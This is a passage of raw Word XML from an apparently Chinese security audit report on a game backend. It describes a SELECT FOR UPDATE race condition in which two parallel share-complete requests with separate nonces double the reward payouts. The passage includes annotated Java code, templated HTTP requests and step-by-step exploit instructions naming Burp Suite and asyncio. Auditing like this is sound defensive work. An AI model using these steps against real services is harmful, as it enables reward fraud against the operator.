          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>只对已存在的数据行加排它锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">——当某个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(inviterUserId, inviteeUserId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_invitation_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>尚无记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">时，两条并发事务均读取到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Optional.empty()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，不存在可被锁定的行，幂等短路分支对两条事务均不生效。两条事务因此各自独立走到：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minerService.unlockSlot(inviterUserId, 8, 2);               // ← 并发调用两次</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>taskExecutionService.updateProgress(inviterUserId, "2", 1); // ← 任务进度双倍计入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">同样的漏洞存在于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareLevel3Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：其早返回条件 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isKycCompleted == 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同样依赖已存在行，首次处理时的竞态窗口完全对称，可导致 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress(inviterUserId, "3", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被并发调用两次。</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攻击者 ──并发两条请求──▶ POST /api/share/complete</w:t>
              <w:br/>
              <w:t xml:space="preserve">    │</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ▼ TokenAuthFilter（验证 Token，注入 userId，安全）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ▼ SignAuthTestFilter（覆盖 /api/share/**，验证签名；两条请求各用独立 nonce 可绕过重放检测）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ▼ ShareController.shareComplete</w:t>
              <w:br/>
              <w:t xml:space="preserve">        inviterUserId 取自 Token（不可伪造）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        inviteeUserId 取自 @RequestBody（攻击者控制，须为真实被邀请人）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ▼ shareService.shareComplete(userId, inviteeUserId, "level2")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ▼ shareLevel2Success(inviterUserId, inviteeUserId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ▼ requireLevel2Invitee → 校验邀请关系（需通过）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ▼ findByInviterUserIdAndInviteeUserIdForUpdate</w:t>
              <w:br/>
              <w:t xml:space="preserve">              ← 竞态根因：无行可锁，两事务均读到 Optional.empty()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        ▼ 幂等短路跳过 → unlockSlot + updateProgress 各被调用两次</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入口：ShareController.java</w:t>
              <w:br/>
              <w:t>// ShareCompleteForm 攻击者可控字段：</w:t>
              <w:br/>
              <w:t>//   Long inviteeUserId  ← 被邀请人ID（攻击者控制，须为真实被邀请人）</w:t>
              <w:br/>
              <w:t>//   String shareType    ← 传入 "level2" 路由到 shareLevel2Success</w:t>
              <w:br/>
              <w:t>@PostMapping("/complete")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; shareComplete(@CurrentUserId Long userId,   // ← Token 注入，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                        @RequestBody ShareCompleteForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    shareService.shareComplete(userId, form.getInviteeUserId(), form.getShareType()); // ← inviteeUserId 污点传入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 路由层：ShareService.java → shareComplete</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void shareComplete(Long currentUserId, Long inviteeUserId, String shareType) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("level2".equals(type)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        shareLevel2Success(currentUserId, inviteeUserId); // ← 污点流入竞态方法</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 竞态漏洞点：ShareService.java → shareLevel2Success</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void shareLevel2Success(Long inviterUserId, Long inviteeUserId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User invitee = requireLevel2Invitee(inviterUserId, inviteeUserId); // 须通过邀请关系校验</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    Optional&lt;UserInvitationRecord&gt; existingOpt =</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userInvitationRecordRepository.findByInviterUserIdAndInviteeUserIdForUpdate(inviterUserId, inviteeUserId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← 竞态根因：当该对尚无记录时，SELECT FOR UPDATE 无行可锁；</w:t>
              <w:br/>
              <w:t xml:space="preserve">    //   并发两条事务均在此读到 Optional.empty()，均不获取任何行级锁</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    if (existingOpt.isPresent()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        UserInvitationRecord existing = existingOpt.get();</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (existing.getInviteType() != null &amp;&amp; existing.getInviteType() &gt;= 2</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">                &amp;&amp; Integer.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>valueOf(1).equals(existing.getIsRegistered())) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            minerService.unlockSlot(inviterUserId, 8, 2);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            return; // ← 幂等短路：首次调用时两条并发事务均绕过此处</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    minerService.unlockSlot(inviterUserId, 8, 2);               // ← 被并发两条事务各调用一次，共两次</w:t>
              <w:br/>
              <w:t xml:space="preserve">    taskExecutionService.updateProgress(inviterUserId, "2", 1); // ← 任务进度被并发计入两次（双倍奖励）</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserInvitationRecord record = existingOpt.orElseGet(UserInvitationRecord::new);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setInviterUserId(inviterUserId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setInviteeUserId(inviteeUserId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setInviteType(2);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setIsRegistered(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userInvitationRecordRepository.save(record); // ← 两条事务均尝试插入，若无唯一约束则各自成功</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使用两个独立 nonce 同时并发投递以下两条请求（Burp Suite "Send group in parallel" 或脚本多线程均可）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求 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&lt;目标主机&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者有效登录Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_A&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;对请求A计算的签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"inviteeUserId": &lt;满足level2条件且此前从未处理过的被邀请人ID&gt;, "shareType": "level2"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求 B（与 A 同时发出，仅 nonce 和 sign 不同）：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&lt;目标主机&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者有效登录Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_B&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;对请求B计算的签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"inviteeUserId": &lt;与请求A相同的被邀请人ID&gt;, "shareType": "level2"}</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934"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者登录自己账号，获取有效 Bearer Token。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="935"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">确认名下有一个满足 level2 条件的被邀请人（真实邀请关系，且为主态用户），且该 (inviterUserId, inviteeUserId) 对在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_invitation_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>尚无记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（即首次 level2 处理）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="936"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">构造两条 body 完全相同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/share/complete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareType="level2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；两条请求各使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>独立的 nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（满足签名过滤器的 nonce 唯一性检查），并分别计算对应签名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="937"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">通过并发工具（Burp Suite Repeater 并行分组 / Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）在同一时间窗口内同时投递两条请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="938"/>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：两条事务均在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByInviterUserIdAndInviteeUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 读到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Optional.empty()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 后继续执行，各自调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>unlockSlot(inviterUserId, 8, 2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress(inviterUserId, "2", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 一次，导致任务 "2" 进度被计入两次、slot 8 被解锁操作触发两次。若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用独立事务（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PROPAGATION_REQUIRES_NEW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）或其实现本身无重复调用保护，攻击者获得双倍任务奖励。</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补充说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareLevel3Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存在完全对称的漏洞——其早返回判断 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>existingOpt.isPresent() &amp;&amp; isKycCompleted==1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同样依赖已存在行，对同一被邀请人的首次 level3 并发请求可触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress(inviterUserId, "3", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 双倍调用，利用方式与上述完全一致，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 改为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>"level3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 即可。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939"/>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940"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通用户；需持有有效 JWT/Bearer Token，并与至少一名满足条件的被邀请人存在真实邀请关系；无法在完全无前置条件的情况下利用，但攻击者只需满足正常游戏业务的邀请关系即可触发。</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41"/>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ShareService.java.shareLevel2Success → UserInvitationRecord.java.getIsRegistered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audit_m193_933_shareComplete_ctrl-path11of23.md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：ShareService.java#shareLevel3Success</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_44" w:id="44"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞43：SELECT FOR UPDATE TOCTOU 竞态——首次邀请记录缺失锁时任务奖励可被重复发放</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="94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shareLevel3Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
